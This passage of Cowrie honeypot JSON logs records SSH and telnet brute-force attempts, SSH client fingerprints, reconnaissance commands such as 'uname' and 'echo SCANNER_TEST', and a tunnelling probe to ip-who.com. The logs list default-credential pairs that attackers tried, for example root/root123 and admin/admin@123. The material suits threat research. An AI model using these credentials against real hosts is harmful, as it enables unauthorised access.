-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:46:17.036622Z","src_ip":"212.227.125.160","session":"fa2ad2892a20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39172,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab70d63baef5","protocol":"ssh","message":"New connection: 212.227.125.160:39172 (1.2.3.4:22) [session: ab70d63baef5]","sensor":"my-vps","timestamp":"2025-08-28T17:46:17.712566Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:46:17.713495Z","src_ip":"212.227.125.160","session":"ab70d63baef5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:46:17.762746Z","src_ip":"212.227.125.160","session":"ab70d63baef5"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ\"wsx","message":"login attempt [root/!QAZ\"wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:46:17.912372Z","src_ip":"212.227.125.160","session":"ab70d63baef5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:46:18.028906Z","src_ip":"212.227.125.160","session":"ab70d63baef5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T17:46:18.029589Z","src_ip":"212.227.125.160","session":"ab70d63baef5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:18.080073Z","src_ip":"212.227.125.160","session":"ab70d63baef5"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:18.081298Z","src_ip":"212.227.125.160","session":"ab70d63baef5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:46:18.670214Z","src_ip":"212.227.125.160","session":"fa2ad2892a20"}
{"eventid":"cowrie.session.closed","duration":"5.5","message":"Connection lost after 5.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:22.322872Z","src_ip":"212.227.125.160","session":"fa2ad2892a20"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin@123","message":"login attempt [admin/admin@123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:46:25.681606Z","src_ip":"171.243.150.185","session":"db32445ad53c"}
{"eventid":"cowrie.session.closed","duration":"21.2","message":"Connection lost after 21.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:27.661179Z","src_ip":"171.243.150.185","session":"db32445ad53c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40930,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca86206a26d6","protocol":"ssh","message":"New connection: 212.227.125.160:40930 (1.2.3.4:22) [session: ca86206a26d6]","sensor":"my-vps","timestamp":"2025-08-28T17:46:37.676614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:46:37.684134Z","src_ip":"212.227.125.160","session":"ca86206a26d6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:46:39.620923Z","src_ip":"212.227.125.160","session":"ca86206a26d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36564,"dst_ip":"1.2.3.4","dst_port":22,"session":"76cae6aa8d3c","protocol":"ssh","message":"New connection: 212.227.125.160:36564 (1.2.3.4:22) [session: 76cae6aa8d3c]","sensor":"my-vps","timestamp":"2025-08-28T17:46:41.348151Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:46:41.352652Z","src_ip":"212.227.125.160","session":"76cae6aa8d3c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:46:41.586733Z","src_ip":"212.227.125.160","session":"76cae6aa8d3c"}
{"eventid":"cowrie.session.connect","src_ip":"171.243.150.220","src_port":33604,"dst_ip":"1.2.3.4","dst_port":22,"session":"a37cf37b9118","protocol":"ssh","message":"New connection: 171.243.150.220:33604 (1.2.3.4:22) [session: a37cf37b9118]","sensor":"my-vps","timestamp":"2025-08-28T17:46:43.294269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:46:43.300591Z","src_ip":"171.243.150.220","session":"a37cf37b9118"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:46:43.501944Z","src_ip":"171.243.150.220","session":"a37cf37b9118"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:46:44.721560Z","src_ip":"212.227.125.160","session":"76cae6aa8d3c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T17:46:46.052506Z","session":"76cae6aa8d3c"}
{"eventid":"cowrie.login.failed","username":"system","password":"OkwKcECs8qJP2Z","message":"login attempt [system/OkwKcECs8qJP2Z] failed","sensor":"my-vps","timestamp":"2025-08-28T17:46:46.141016Z","src_ip":"171.243.150.220","session":"a37cf37b9118"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:47.428797Z","src_ip":"171.243.150.220","session":"a37cf37b9118"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:46:48.399364Z","src_ip":"212.227.125.160","session":"76cae6aa8d3c"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:46:48.874642Z","src_ip":"212.227.125.160","session":"76cae6aa8d3c"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":35428,"dst_ip":"1.2.3.4","dst_port":23,"session":"47a6bc2a1f25","protocol":"telnet","message":"New connection: 176.65.149.186:35428 (1.2.3.4:23) [session: 47a6bc2a1f25]","sensor":"my-vps","timestamp":"2025-08-28T17:46:53.195744Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:46:53.233439Z","src_ip":"176.65.149.186","session":"47a6bc2a1f25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:46:53.249273Z","src_ip":"176.65.149.186","session":"47a6bc2a1f25"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T17:46:53.250742Z","src_ip":"176.65.149.186","session":"47a6bc2a1f25"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T17:46:53.251703Z","src_ip":"176.65.149.186","session":"47a6bc2a1f25"}
{"eventid":"cowrie.session.connect","src_ip":"24.107.208.181","src_port":41133,"dst_ip":"1.2.3.4","dst_port":23,"session":"ef29ee113184","protocol":"telnet","message":"New connection: 24.107.208.181:41133 (1.2.3.4:23) [session: ef29ee113184]","sensor":"my-vps","timestamp":"2025-08-28T17:47:08.401689Z"}
{"eventid":"cowrie.session.closed","duration":13.252322673797607,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:21.653942Z","src_ip":"24.107.208.181","session":"ef29ee113184"}
{"eventid":"cowrie.session.connect","src_ip":"199.195.253.95","src_port":43820,"dst_ip":"1.2.3.4","dst_port":22,"session":"748c044f0137","protocol":"ssh","message":"New connection: 199.195.253.95:43820 (1.2.3.4:22) [session: 748c044f0137]","sensor":"my-vps","timestamp":"2025-08-28T17:47:23.282482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T17:47:23.285749Z","src_ip":"199.195.253.95","session":"748c044f0137"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T17:47:23.493617Z","src_ip":"199.195.253.95","session":"748c044f0137"}
{"eventid":"cowrie.login.failed","username":"shane","password":"shane","message":"login attempt [shane/shane] failed","sensor":"my-vps","timestamp":"2025-08-28T17:47:24.370651Z","src_ip":"199.195.253.95","session":"748c044f0137"}
{"eventid":"cowrie.login.failed","username":"system","password":"OkwKcECs8qJP2Z","message":"login attempt [system/OkwKcECs8qJP2Z] failed","sensor":"my-vps","timestamp":"2025-08-28T17:47:25.119845Z","src_ip":"212.227.125.160","session":"ca86206a26d6"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:25.607417Z","src_ip":"199.195.253.95","session":"748c044f0137"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51468,"dst_ip":"1.2.3.4","dst_port":23,"session":"1caf6459c783","protocol":"telnet","message":"New connection: 212.227.235.229:51468 (1.2.3.4:23) [session: 1caf6459c783]","sensor":"my-vps","timestamp":"2025-08-28T17:47:26.600637Z"}
{"eventid":"cowrie.session.closed","duration":"49.3","message":"Connection lost after 49.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:26.978153Z","src_ip":"212.227.125.160","session":"ca86206a26d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36902,"dst_ip":"1.2.3.4","dst_port":23,"session":"348def4a3fc4","protocol":"telnet","message":"New connection: 212.227.235.229:36902 (1.2.3.4:23) [session: 348def4a3fc4]","sensor":"my-vps","timestamp":"2025-08-28T17:47:31.943664Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T17:47:32.517098Z","src_ip":"212.227.235.229","session":"348def4a3fc4"}
{"eventid":"cowrie.session.closed","duration":2.7158243656158447,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:34.659419Z","src_ip":"212.227.235.229","session":"348def4a3fc4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36918,"dst_ip":"1.2.3.4","dst_port":23,"session":"85575777de27","protocol":"telnet","message":"New connection: 212.227.235.229:36918 (1.2.3.4:23) [session: 85575777de27]","sensor":"my-vps","timestamp":"2025-08-28T17:47:34.920209Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:47:35.484675Z","src_ip":"212.227.235.229","session":"85575777de27"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:47:35.928885Z","src_ip":"212.227.235.229","session":"85575777de27"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-28T17:47:35.987200Z","src_ip":"212.227.235.229","session":"85575777de27"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T17:47:36.211324Z","src_ip":"212.227.235.229","session":"85575777de27"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","size":514,"shasum":"2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/2a92b38f913f60f0c4e78b38c7c06273ebdbb6887a1be6a5b77a53775a395aa0 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:37.374631Z","src_ip":"212.227.235.229","session":"85575777de27"}
{"eventid":"cowrie.session.closed","duration":2.4586708545684814,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:37.378814Z","src_ip":"212.227.235.229","session":"85575777de27"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59960,"dst_ip":"1.2.3.4","dst_port":22,"session":"44b729351cfb","protocol":"ssh","message":"New connection: 217.72.205.35:59960 (1.2.3.4:22) [session: 44b729351cfb]","sensor":"my-vps","timestamp":"2025-08-28T17:47:38.803840Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:38.804908Z","src_ip":"217.72.205.35","session":"44b729351cfb"}
{"eventid":"cowrie.session.closed","duration":13.826351881027222,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:47:40.426926Z","src_ip":"212.227.235.229","session":"1caf6459c783"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":25007,"dst_ip":"1.2.3.4","dst_port":22,"session":"99179300ab13","protocol":"ssh","message":"New connection: 212.227.235.229:25007 (1.2.3.4:22) [session: 99179300ab13]","sensor":"my-vps","timestamp":"2025-08-28T17:47:48.517759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:47:48.653315Z","src_ip":"212.227.235.229","session":"99179300ab13"}
